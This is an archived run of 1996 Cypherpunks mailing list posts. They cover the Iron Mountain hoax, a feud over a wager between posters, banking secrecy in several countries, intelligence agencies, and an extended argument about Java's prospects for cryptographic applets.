Message-ID: <Pine.SUN.3.93.960424203650.3252I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Timothy C. May wrote:
> 
> Frankly, I thought that Black Unicorn claimed to have seen the error of his
> ways (in terms of debating with Bell) and was going to stop?

I closed what I thought was the only outstanding issue I had with him.  No
more.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 24 Apr 1996 23:27:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: The Iron Mountain Report
In-Reply-To: <199604242213.AAA18326@utopia.hacktic.nl>
Message-ID: <5bvfx8m9Loje085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199604242213.AAA18326@utopia.hacktic.nl>,
nobody@REPLAY.COM (Anonymous) wrote:

> Some years ago the federal government set up a special 
> [inaudible] group. For two-and-a-half years they met in secret at 
> Iron Mountain, New York. Their findings were called "Report from 
> Iron Mountain on the Possibility and Desirability of Peace." 
> Their document, by some of the leading thinkers, was suppressed. 
> Later, it was printed in a limited edition, with the *names* 
> removed. Some were shocked by what they read.

Some "limited edition"!  The first edition of Leonard C. Lewin's
delightful and insightful satire was a trade hardcover widely
distributed by The Dial Press in 1967 that has remained in print ever
since.

That elements of the lunatic fringe of the American right take this book
on face value, as the suppressed report of a secret think-tank, would
make veteran trollers like James "Kibo" Parry gulp with envy.

Why stop here?  There is a document ("Protocols") that PROVE that the
world is secretly run by a conspiracy of Jewish elders.  (The rumors
that this document was a fabrication by the Czarist Russian secret
police are obviously the handiwork of that same conspiracy.)

YHBT.  HAND.(*)

Alan "Remember Carcosa!" Bostick

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

(*)You Have Been Trolled.  Have A Nice Day.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX8JpuVevBgtmhnpAQEYfQMAopQ55+UeNn6egqoukfioOmbQLFyHmWbH
FEDZjHDMcqyPpZPgedEKlYOF7PS8ArkIlh9Q843+hO5GSyCpC8InWK4yK8dOQLlN
P5oo2LdnDnh2fly7z0AmIAfv1Izyj/Bw
=UKZz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 18:07:58 -0700 (PDT)
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Anonymous banking
In-Reply-To: <01I3X9YJ35NE8Y50LP@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960424205627.3252L-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 24 Apr 1996, E. ALLEN SMITH wrote:

> 	Speaking of the below information, what is anonymous banking like in
> Austria,

Not too bad, but there are crackdowns on anonymous and pseudonym accounts.
MLAT's exist with the United States.  Austria has been the focus of
careful investigations and a lot of diplomatic pressure.  EC membership
will require compliance with standards for client identification.  The
article is somewhat in error.  Anonymous accounts are no longer easy to
open and generally require the voucher of a local attorney.


 Colombia,

Do not travel to or use Colombian banks for your financial needs.
Columbia is essentially lawless outside of the tourist areas and the
concentration on drug investigations combined with the presence of the
military for the purposes of law enforcement makes banking secrecy a near
impossibility.  Given a moderate budget I could have the banking
information of any depositor in Columbia in short order.  So could you.

 Venezuela,

Banking secrecy is dependent on connections with local officials or
'corrupt' bankers.  I don't find that Venezuela properly protects banking
secrecy from a statuatory prespective.

 and Thailand?

Better, but still subject to some criminal investigations and limited
statuatory protection.

In general adding a country to the money laundering offender list is a
political decision and NOT demonstrative of a country's actual money
laundering use.  (Note that Vanuatu is not included, nor is Isle of Man).
Mostly its a question of countries with corrupt officials who will look
the other way, not of countries which strict banking privacy.

> >Austria, the only country in the EU which allows anonymous bank accounts,
> >was adamant its current legislation did not run counter to the resolution.

This is nearly irresponsible reporting.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 18:18:41 -0700 (PDT)
To: cypherpunks@count04.mry.scruznet.com
Subject: Re: EYE_suk
In-Reply-To: <199604251859.LAA28220@count04.mry.scruznet.com>
Message-ID: <Pine.SUN.3.93.960424210747.3252M-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 25 Apr 1996 cypherpunks@count04.mry.scruznet.com wrote:

>   >>Isn't the CIA forbidden from doing anything on US soil?

>   >Errr,
>   >That is the Feeb's department, & they guard it like the family
>   >jewels.....
>   >

>     BZZT!!! wrong answer since 1981 on december 4  when president reagan
> signed it into Executive Order #12333  TLA's(those intelligence
> agencies having strictly offshore charters CIA,NSA others) have been permitted
> to operate domestically in cases of National Security(or involvement with 
> persons suspected of being agents for foreign entities) and Drug War issues.

Only if the agents involved are attached to the FBI and report directly to
the FBI during the investigation.  Note that they were permitted about
this same amount of autonomy under 50 U.S.C. 102(d)(3).

> Formerly it was simply illegal but since the intel community had taken
> such a hard hit during the church subcommittee hearings of the 1970's
> the new tactic was to acquire legitimacy for black ops on domestic fronts
> thus the above EO was shoved under reagans nose quickly...

The above paragraph is a bit light on facts.

Actually, today to do domestic black ops you just let E-Systems handle it.
No need to use agency personal when 7/8 of E-System's employees are former
agency.  The CIA doesn't bother to do local black ops anymore.  Look to
other organizations.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 21:33:28 -0700 (PDT)
To: Martin Minow <minow@apple.com>
Subject: Re: The Iron Mountain Report
In-Reply-To: <v02140b00ada47b37a48c@[17.202.12.102]>
Message-ID: <Pine.GUL.3.93.960424212754.22644A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The author of the Iron Mountain Report was interviewed on PBS a few weeks
ago. It was a really over-the-top parody published in 1967.

A quick AltaVista search turns up several references to the Iron Mountain
thing being a hoax, and at least two militia-type conspiracy wacko pages
insisting that it's true.

Every once in a while, I get mail asking whether I really have contacts in
Sendero Luminoso, since a bit of satire I wrote was quoted in the Web
Review (which made no attempt to contact me before printing the satire as
my position). 

Truth is far more fragile than fiction.

-rich

On Wed, 24 Apr 1996, Martin Minow wrote:

> >Some years ago the federal government set up a special
> >[inaudible] group. For two-and-a-half years they met in secret at
> >Iron Mountain, New York. Their findings were called "Report from
> >Iron Mountain on the Possibility and Desirability of Peace."
> >Their document, by some of the leading thinkers, was suppressed.
> >Later, it was printed in a limited edition, with the *names*
> >removed. Some were shocked by what they read.
> >
> 
> I've read the Report from Iron Mountain (I bought it about 20
> years ago, and I believe that it's currently available in
> paperback). While it *could* be legitimate, I think it may be
> more approprately filed next to Johnathan Swift's Irish cookbook.
> 
> Martin Minow
> minow@apple.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 24 Apr 1996 18:37:11 -0700 (PDT)
To: llurch@networking.stanford.edu>
Subject: Re: Rabbi Hier Testimony
In-Reply-To: <Pine.GUL.3.93.960424160212.19618N-100000@Networking.Stanford.EDU>
Message-ID: <olThP1C00YUv9WTGAs@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was waiting for Rich to whine about my message criticizing the Simon
Wiesenthal Center. He was good enough to oblige, being the FUCKING
STATIST that he is:

> The majority of what you said in that message was misleading at best, but
> I haven't said anything because that's off topic, and who listens to a
> FUCKING STATIST anyway. I know you don't have time to correct any
> acknowledged errors on you web pages, so why should I waste my time
> pointing them out?

Funny, that. The links I provided were primarily to reports from the
ACLU, CDT, wire dispatches, and firsthand reports by respected
journalists.

They must be part of the FUCKING STATIST conspiracy to oppress the poor,
beleaguered -- and sadly misunderstood -- free speech advocates at the
Simon Wiesenthal Center! 
 
> So yes, Morris Dees is a fool, and so are you.

A stinging blow! I can hardly wait for the next.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 24 Apr 1996 18:38:11 -0700 (PDT)
To: llurch@networking.stanford.edu>
Subject: Re: Militias, reputation capital, unfounded rumor-mongering, and the DNS
In-Reply-To: <Pine.GUL.3.93.960424121254.19618H-100000@Networking.Stanford.EDU>
Message-ID: <AlThRTa00YUvFWTHUE@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 24-Apr-96 Militias, reputation
capita.. by Rich Graves@networking.s 
> I do not expect this story to die, even though it's completely false --
> it's too good. The meme in the subject line is awfully strong, lots of
> people won't take the time to read more than the title, and who really
> listens to a FUCKING STATIST anyway. 

Wow. Rich has surprised me by demonstrating that even he can be
insightful -- for a FUCKING STATIST!

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 21:42:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [Yadda Yadda :-)] Re: Rabbi Hier Testimony
In-Reply-To: <olThP1C00YUv9WTGAs@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960424213332.22644B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Declan B. McCullagh wrote:

> I was waiting for Rich to whine about my message criticizing the Simon
> Wiesenthal Center. He was good enough to oblige, being the FUCKING
> STATIST that he is:

No, I refused to reply to your obvious troll the first time, or to the
various Nazi tracts that have been posted anonymously recently. You had to
repeat the off-topic smears twice before I decided to humor you. 

> Funny, that. The links I provided were primarily to reports from the
> ACLU, CDT, wire dispatches, and firsthand reports by respected
> journalists.

All presenting one point of view, stated less strongly than your link
text. There have been all sorts of opposing points of view, letters to the
editor, clarifications, and retractions since then. 

If you want to know what I think, look it up in DejaNews. This was all
covered in early February.

As I told you on February 9th, I am win-announce@metrics.com.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 21:54:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <m0uCIti-00094cC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:07 AM 4/24/96 -0700, jamesd@echeque.com wrote:
>At 11:45 PM 4/23/96 -0700, Timothy C. May wrote:
>> And so the back-and-forth continues...taking up even more list space
>> arguing, waffling, finessing, rebutting, disputing, and on an on.
>>
>> Exactly as several of us have predicted.
>
>True, but one should note that it is Jim Bell that is weaseling,
>and that Unicorn is not weaseling.

Who says?  Unicorn started by making an unbelievable challenge (especially 
given the fact that he, unlike I, is anonymous) and THEN he claimed that he 
didn't believe we'd ever agree to terms, etc.

This sounds like weaseling to me.  Let Unicorn FIRST identify himself.  Then 
we'll see who's "weaseling."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 24 Apr 1996 22:13:18 -0700 (PDT)
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: [NOISE] [Wager: Seeming Resolution]
Message-ID: <m0uCJ4L-000916C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:16 AM 4/25/96 +0000, Jonathon Blake wrote:
>
>	Jim:
>
>On Wed, 24 Apr 1996, jim bell wrote:
>
>> Notice that he hasn't presented what he would claim to be the scope of the 
>> conditions, which suggests that he's going to try to spring them on me 
>
>	I haven't seen a list of your conditions yet.
>
>	How about placing your minimally acceptable requirements 
>	for accepting Black Unicorn's Wager.  

At the very least, he'd have to IDENTIFY himself at least to the extent that 
I have done so.  Name, address, telephone number, etc.  


>> the examples quoted in that SC decision, which were cited as exceptions to 
>> 5th amendment protections in the US, all of them represent examples which 
>> were only considered technologically useful in the last 100 years, the 
>> oldest being fingerprinting.  Given this, it is easy to conclude that there 
>
>	Which makes it interesting that he provides an Ecclesiastical 
>	Court Decision from the Seventeenth Century.  
>
>	It isn't the US, but you haven't made an limitations 
>	as to which legal system is acceptable.

As you quoted me above, you are aware that my point was that the SC-listed 
exceptions to the 5th amendment were recent and didn't have older US 
precedent.  I claimed that there was no logical reason to believe that such 
claimed exceptions were anything other than comparatively recent excuses 
given to allow violations of the 5th amendment.   While I am not totally 
disinterested in foreign examples, that was NOT the area under discussion. A 
foreign example is irrelevant because it does not challenge my claim. Notice 
that Unicorn has studiously avoided my original observation.  
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 21:56:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [Yadda Yadda :-)] Re: Militias, reputation capital, unfounded , rumor-mongering, and the DNS
In-Reply-To: <AlThRTa00YUvFWTHUE@andrew.cmu.edu>
Message-ID: <Pine.GUL.3.93.960424214240.22644C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 24-Apr-96 Militias, reputation
> capita.. by Rich Graves@networking.s 
> > I do not expect this story to die, even though it's completely false --
> > it's too good. The meme in the subject line is awfully strong, lots of
> > people won't take the time to read more than the title, and who really
> > listens to a FUCKING STATIST anyway. 
> 
> Wow. Rich has surprised me by demonstrating that even he can be
> insightful -- for a FUCKING STATIST!

I could read your answer three ways. Which is it?

1. I'm right, and you're making light of our public disagreement. Cool. As
   I keep telling you, I'm 95% behind 95% of what you're doing, and I hate
   to disagree publicly.

2. I'm right, but you don't care, because the propaganda advantage of
   leaving the idea of the FBI's snooping private email is good for the
   cause. Not cool -- you really don't strike me as a propagandist.

3. You're trying to say that I'm wrong, or you're saying, "I know you are,
   but what am I?" Inconclusive.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 24 Apr 1996 23:27:40 -0700 (PDT)
To: jimbell@pacifier.com
Subject: [Yadda Yadda] Poker (was Re: [NOISE] [Wager: Seeming Resolution])
In-Reply-To: <m0uC7oO-00092NC@pacifier.com>
Message-ID: <Hrwfx8m9LgyH085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0uC7oO-00092NC@pacifier.com>,
jim bell <jimbell@pacifier.com> wrote:
> What "kill"?  Unicorn claimed a few days ago that he THOUGHT that his 
> challenge would never be accepted, ostensibly because of haggling by me.  I 
> interpret this as unwillingness to bargain in good faith (sandbagging), 
> which is reasonable given Unicorn's track record.  Given this thinly-veiled 
> warning of dishonesty, it is only realistic that I would not want to accept 
> his challenge.  

Jim Bell's ignorance apparently knows no boundaries.  That's not what 
"sandbagging" means.

In poker, to sandbag is to raise a bet after having opened that betting
round by checking.  It's frowned upon in some poker games, but completely
acceptable in others - check the house rules before trying it.

Try as I might, I can't see how Black Unicorn's statements qualify as
sandbagging.  He certainly didn't open the betting by checking!

- -- 
Alan Bostick               | They say in online country there is no middle way
mailto:abostick@netcom.com | You'll either be a Usenet man or a thug for the CDA
news:alt.grelb             |    Simon Spero (after Tom Glazer)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMX8PwuVevBgtmhnpAQHf3wL/VWAPk8uF8p9hsUKp9q6OLd8TpRKN4N0Y
aE3t2ECHB1unfjtSAeQxF1PeGhJdv53XWvcRyS44dgHNaylovpbJSXN3IEUg0GeT
9JyaieZ02EHBlHeNrUjCWTNfJAtSLVdX
=AGof
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Thompson <jim@smallworks.com>
Date: Wed, 24 Apr 1996 20:21:24 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: RISKS: Compuserve "secure" login
In-Reply-To: <199604242010.NAA02828@cygnus.com>
Message-ID: <9604250317.AA20026@butthead.SmallWorks.COM>
MIME-Version: 1.0
Content-Type: text/plain


 
> A couple years ago I found an obvious application of Diffie-Hellman which
> avoids this problem; unfortunately it turned out to be patented by someone
> from Siemens (first as a German patent and then a US patent, so it's
> definitely too much trouble to try to overturn the patent...)
> The basic approach is to use a commutative hash function, which lets
> both sides calculate HA(B) == HB(A) ; modular exponentiation worked fine.

Any chance that you're willing to discuss this further?

-- 
Jim Thompson / Smallworks, Inc. / jim@smallworks.com  
      512 338 0619 phone / 512 338 0625 fax
The Internet is Microsoft's Vietnam...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 24 Apr 1996 22:31:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <2.2.32.19960425053227.006a09e4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:42 PM 4/24/96 -0800, Jim Bell wrote:

[snip]
>Let Unicorn FIRST identify himself.  Then we'll see who's "weaseling."

ROTFL.

This is getting too predictable...



Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 22:00:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Mindshare and Java
Message-ID: <ada43daa150210045c4d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


"Krakatoa--East of Java"

I gather that those interested in software and programming have migrated, a
la "Blood Music," to the so-called coderpunks mailing list, leaving we the
preterite to discuss the Turner Diaries, Zundelsites, the wisdom of nuking
the Japs, racism, banking privacy laws, bets about the meaning of the 5th
Amendment, and so on.

Well, I was not invited to join the elite and secret coderpunks list, but I
still have some thoughts on coding and, especially, on the opportunities
offered by Java. Sorry if this interferes with discussions of Rabbi Heir
and Morris Dees.

Others still on the Cypherpunks list are more expert at Java than I, but
they seem to be saying little (maybe all of their words are on the
coderpunks list?), so I'll say what's on my mind here.

[It is my firm opinion that the creation of a separate mailing list to
discuss only coding or software issues is a mistake. For several reasons,
which I can discuss at lenght in a separate message. Basically, it is
easier to filter-reduce a large group, such as with "[CODE]" prefixes or by
reputations, than it is to filter-expand a moribund group! :-} I've seen
many sub-critical mass list become moribund. And there is another important
point, that the Cypherpunks/Coderpunks split is producing the expected
result: the Cypherpunks are rapidly losing any remaining anchors to
technical/programming issues and are thus becoming almost wholly
politics-driven. While I am of course highly motivated by political issues,
they must be grounded in technical issues (else we are just another
anti-CDA, anti-censorship, anarcho-capitalist, libertarian ranting group).
I can't say what's happening on the coderpunks list, but my suspicion is
that many of the coderpunks-only readers are analogously disconnected from
ideological/political issues and think, perhaps, that the main purpose of
the list (and of Cypherpunks) is to discuss compiler optimizations for PGP
source code. It is sad to see the Cypherpunks lose its grounding. Maybe in
a few months, the coderpunks will simply declare victory, dissolve the
Cypherpunks list, and rename themselves, a la coderpunks = cypherpunks++.)


But I come not to bury Cypherpunks, I come to praise Java.

Some points:

1. Java is of course not a perfect language, nor even the best for specific
applications. Other languages will continue to thrive. Critics of the
language and related items (applet model, JDK, JITs, etc.) may point to
various problems (e.g. security).

2. However, the "big picture" is compelling. Java arrives at a time when a
Babel of languages and platforms threatens interoperability. C++ is
despised by many (though, to be fair, liked by many, too), and developers
are adopting Visual Basic (and the vbx widgets, etc.), PowerBuilder,
Delphi, flavors of Smalltalk (no pun intended), and scripting languages
(Perl, TCL, Python, etc.).

3. The Java/Virtual Machine/applet model is not altogether new (remember
P-Code?), but this implementation arrives at the right time. Sun's support,
the support by Netscape, Microsoft, Novell, etc., further buttresses the
building momentum. The "mindshare" race is essentially over.

Platform-independence is compelling for many apps. Speed is often not
critical, especially when many Pentium- or PowerPC-class machines are
basically idling most of the time. (Peak performance, when a user is
actually _doing_ something at the machine, is still an issue...nobody wants
to wait 10 minutes for a bytecode version of a Java program to run while
its C brother completes in 15 seconds! For these more time-critical apps,
either native code (in C or C++) is likely, or normally compiled Java
(losing some platform-independence), or just-in-time (JIT) compilation of
dowloaded applets will be needed.

4. What is so compelling, to me, is that Java programs have an excellent
chance of running on various flavors of Unix, on Windows-95 and NT systems,
on Macs, and on other systems without changes, and without any special
compilers bought by the users! (Netscape browsers, and even Microsoft
browsers, are able to view applets, or soon will be. And cheap or free
applet viewers are available.)

5. Again, the speed may or may not be up to what C or C++ offers. But, as I
noted, speed is in most cases less important than other factors. (At least
in the very important domain of new apps, or low-volume apps. While "Excel"
has to run at a rapid clip, "NoiseSphere" clearly does not. Nor, I contend,
do most text-oriented crypto programs. The proliferation of 133-MHz Pentia,
for example, means that even a 5x slowdown is probably acceptable (maybe
even 10x?).

[Before people note that some Java programs are running at 3-5% of their C
brethren, think of where things will be in a year, not just today. JIT
compilers should narrow the gap, and even full-blown compilers are likely.]

6. One can imagine several applets of interest to Cypherpunks. The ability
to fairly transparently run them on multiple platforms, effectively
bypassing the platform dependencies, is very important. Check out Hal
Finney's site for some "crytographic primitive" applets he's written.

7. The Web-centric orientation also fits in closely with Cypherpunk-type
plans. Who will do the first remailer in Java? Remailers operating on Web
sites? (For example, where a browser connects to a site, picks up messages
marked as being for him, or perhaps picks up (copies) all messages, and
then runs an applet to PGP-decrypt, then deposits the outgoing messages at
another Web site....just a possible approach.)

8. Personal note. I've had a version of Smalltalk called "Smalltalk
Agents," running on my PowerMac. Lots of problems, with support and with
the limited number of other users...essentially, no other users to talk to,
no books, little documentation, sub-critical mass. And, worst of all, I
know that anything I write will not be usable by others, unless they have
Smalltalk and can successfully port over to their version of Smalltalk my
program. Not likely, of course. (Where some of these big packages fit
nicely is in large apps, such as air traffic control systems, reengineering
of legacy code, etc.)

So, I was faced with a heart-rending choice: get an Intel box, put Linux on
it, and try to "get in the mainstream" by writing something in Perl, or
TCL, etc. (Though I note that the early success with writing remailers in
Perl has not been followed by any other stunning applications of a
similarly revolutionary nature...and I don't know of anybody doing anything
Cypherpunkly-interesting in TCL, for example.)

However, it now appears that the definition of "in the mainstream" is
changing, so that Cypherpunkly-interesting applications need not be
confined to C or Perl programs running on Unix or Linux boxes! Rather, it
looks like Java applets running on various platforms will be able to lever
most of the same advantages. (Modulo some other issues; I'm not, for
example, claiming that my opportunistically-connected PowerMac, connecting
at 28.8, will be the equivalent of a SPARCstation running the usual
complement of tools.)

9. I won't comment here on the various other claims about Java, about
safety and security features. Improvements will be made, either in
forthcoming fixes and releases, or in extensions such as "E" (Electric
Communities, having several Cypherpunks as members, including Doug Barnes,
Jim McCoy, others.). I don't know if these "extensions" will hurt the
language, as it sort of depends on how the extensions are handled, how
widespread the extensions become, etc. (Not being versed in "E," I can't
see why the extensions aren't handled as a another class library, or
automatically downloaded with any applet that needs the extensions....if E
must be a separate package, then of course it must be in the various users'
systems, and getting this kind of "buy-in" by the browser makers may be
problematic.).

10. "Mindshare" is the real story. Java arrives at the right time.
Cypherpunks needs--those needs that go beyond just the "sealed envelopes
and signatures" level which PGP provides so well--are likely to fit in with
this Net-centric communications model. (I'm already thinking in terms of
Java applets for building blocks for Cypherpunk sorts of things.)

11. I was in the Homebrew Computer Club, the _legendary_ Homebrew Computer
Club, in the mid-70s. (I several times handed out free samples of Intel
8080s, which I was working with at the time...)

Not since then have I seen the same level of opportunity. I've seen a lot
of hyped fads come and go. This one may be hyped, but it looks very real to
me.

The Web was obviously of incredible importance as a self-publishing medium,
and its importance can scarcely be overstated. But in terms of Cypherpunks
sorts of goals, which require more than just self-publishing and expanded
channels of communication, the Web was lacking in terms of active objects,
programs, etc. that could be deployed by programmers.

Java and the things related to it appear to be the tools necessary to
really spice things up on the Web. (And by "spiced up" I don't mean dancing
logos on Web pages!)

12. So, there you have it. I see great opportunities for us. A set of class
libraries for Java, and a set of Java applets, could be important. (Wei
Dei's crypto library is extremely well-regarded here, but the pieces are
not being integrated into new, higher-level building blocks....lots of
issues here.)

13. In any case, I have no real interest in the Zundelsite vs. Southern
Poverty Legal Whatever, nor the other such rants, so I am immersing myself
in this area.

(The archives should reveal my articles about "the ontology of money," a
topic Bob Hettinga and others have also talked about, and this is one of
the places I would like to go with this Java business.)

14. There are a _lot_ of resources on Java. Many Web sites, many papers,
many FAQs, many, many things. Search engines will reveal vast numbers of
hits. This is the first major introduction of a language since the
explosion of the Web, so it may be that many or most people rely on the Web
almost exclusively for documentation.

There are also several implementations of Java. The JDK (Java Development
Kit) is bundled with several available books on Java. Consult your
bookstore. I'm using a slightly-crippled version of "Roaster," a Mac
development package from Natural Inteligence. (The development tools will
differ from platform to platform, naturally enough.) Other Mac versions,
from both Metrowerks and Symantec, are coming (or are imminent). I'll say
what my experiences are with the more-final versions.

I believe usable development packages for Windows are cheap or free, and
even Symantec's "Cafe Lite" is in the $100 range. Thus, it's easy to get
started.

My wager is that more students and others will learn Java over the next few
years than have learned C++ in the past ten years.

15. Your mileage may vary.

Enough for now. I now return control of your monitor to your regularly
scheduled political debate.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 22:49:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mindshare and Java
In-Reply-To: <ada43daa150210045c4d@[205.199.118.202]>
Message-ID: <Pine.GUL.3.93.960424222517.22644F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Tim, didn't you once tell me that long opera were bad?]

I agree that the major innovation, and cypherpunk opportunity, of Java is
in its cross-platform nature, not its vaunted ability to run untrusted
code safely. I'm sorry, I'm just not interested in running untrusted code. 
Give me digitally signed code that I can trust, or for which the author 
can at least be held accountable, and I'll be happy. 

As cool as many of the people on the Java team are, though, I am dubious
that Java is going to live up to the hype. It is still not clear to me
that Microsoft is going to support it seriously in their browser, which by
mid-1997 will be so tightly integrated with the lowest-common-denominator
operating system that there will be no room for Netscape.

NT scares me, too. Even major universities with huge investments in UNIX,
kerberos, and AFS are flirting with NT. I believe they're fucking nuts,
but they're doing it. 

I think it's prudent to hold your nose and accept that Visual Basic is
here to stay. Microsoft isn't going to let Java fulfill its promises.

If you're talking *mind*share, it's all Java. All the best minds are
working on it. But if you're talking *market* share, like what people
spend money on, and get money for, it's VB.

I'm not saying that Microsoft is going to take over the world. We're going
to have a balkanized computing world for some time. But Microsoft can and
will prevent Java from subverting their share of the world.

Has Microsoft even licensed Java, or are they still at the vague December
7th "letter of intent" stage? You know that the early press reports that
Microsoft had licensed Java were wrong, didn't you? You know that the
Internet Explorer 3.0 beta supports VB and not Java, don't you?

[Gee, was that *Tim* complaining about a proponderance of off-topic posts? 
I wholly agree, so I've been *trying* to ignore all the trolls. I invite
people to alt.revisionism and other appropriate forums for the Nazi stuff.
Unfortunately, alt.censorship is a Grubor cesspool, and the
fight-censorship list is subject to content-based moderation. But I
digress...]

-rich
 http://www.c2.org/~rich/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 24 Apr 1996 14:25:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cashless Society and the Coming Collapse
Message-ID: <199604242124.XAA14247@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


http://www.jcave.com/~whedonr/news2.htm


The Cashless Society

The October 31 issue of Information Week featured an article on the
October 13 acquisition of Intuit Inc. by Microsoft Corporation for 1.5
billion dollars. Their vision is to create a world where all financial
transaction are performed electronically. "Microsoft's vision of the
future is clearly a world in which the majority of consumer and
business transactions will take place online". Other companies are also
rushing to enter the electronic transaction market place. Soon, there
will simply be no need for cash, everything will be done on line.
Automatic debits and credits from your bank and credit accounts will be
performed in a few milliseconds. You will be able to purchase nearly
anything in the world from your home via the electronic transaction.
(Since the original writing of this article, Microsoft did not receive
approval to make this merger with Intuit. However, the vision of
Microsoft stays the same).

America is already now seeing a widespread use of the "intelligent"
